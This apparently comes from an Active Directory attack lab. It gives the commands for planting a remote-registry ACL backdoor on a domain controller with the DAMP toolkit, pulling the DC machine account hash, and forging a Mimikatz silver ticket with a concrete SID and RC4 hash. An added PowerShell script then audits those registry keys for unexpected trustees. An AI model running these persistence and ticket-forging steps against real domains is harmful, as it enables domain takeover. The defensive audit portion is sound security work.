Load Add-RemoteRegBackdoor from the DAMP toolkit (dot-source it so its functions are available in the session)
. .\DAMP-master\Add-RemoteRegBackdoor.ps1
Modify the registry key ACLs on the target so the chosen trustee (here student518) is granted remote read access
Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student518 -Verbose
That trustee can then retrieve the domain controller's machine account hash over remote registry and use it to forge a service ticket for the DC
. .\DAMP-master\RemoteHashRetrieval.ps1
Get-RemoteMachineAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
Use Mimikatz to forge a silver ticket for the DC's HOST service as Administrator (kerberos::golden with /service and the machine account RC4 hash), supplying the domain SID, and inject it into the current session with /ptt
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:529042dc78d388fdab3cf9eba1a0903e /user:Administrator /ptt"'
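Defensive check for the ACL change this technique depends on. This is an added example, not part of the original notes or of the DAMP project: it audits the registry keys whose DACLs gate remote reads of the boot key, SAM and LSA secrets, and reports any trustee outside an expected baseline. The key list, the baseline trustees and the requirement to run it as SYSTEM on the host being audited are assumptions; tune the baseline against a known-good machine.

```powershell
# Added audit script (not from the original page or DAMP). Run locally on the
# host under audit as SYSTEM: the SAM and SECURITY hives are not readable by a
# plain administrator, so Get-Acl on them fails otherwise (reported as a warning).

# Keys whose DACLs control remote registry access and the hashes/secrets behind it.
# Assumption: this is the set a remote-registry backdoor of this kind must loosen.
$SensitiveKeys = @(
    'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg',
    'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\JD',
    'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Skew1',
    'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Data',
    'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\GBG',
    'HKLM:\SAM\SAM\Domains\Account',
    'HKLM:\SECURITY\Policy\Secrets'
)

# Identities that legitimately hold ACEs on these keys. Assumed baseline; compare
# with a clean host of the same OS build before relying on it.
$ExpectedTrustees = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'BUILTIN\Backup Operators',
    'NT AUTHORITY\LOCAL SERVICE',
    'CREATOR OWNER'
)

function Get-UnexpectedRegistryTrustee {
    param([string[]]$Keys = $SensitiveKeys, [string[]]$Expected = $ExpectedTrustees)
    foreach ($key in $Keys) {
        try { $acl = Get-Acl -Path $key -ErrorAction Stop }
        catch { Write-Warning "Cannot read ACL on ${key}: $($_.Exception.Message)"; continue }
        foreach ($ace in $acl.Access) {
            $who = $ace.IdentityReference.Value
            # Any Allow ACE for an identity outside the baseline is worth a look;
            # a single extra user or group with ReadKey is the footprint here.
            if ($ace.AccessControlType -eq 'Allow' -and $Expected -notcontains $who) {
                [pscustomobject]@{
                    Key       = $key
                    Trustee   = $who
                    Rights    = $ace.RegistryRights
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

Get-UnexpectedRegistryTrustee | Format-Table -AutoSize
```

Pair the audit with a SACL on the same keys so that DACL changes raise event 4670 (permissions on an object were changed) on the DC, which catches the modification at the time it happens rather than on the next scan.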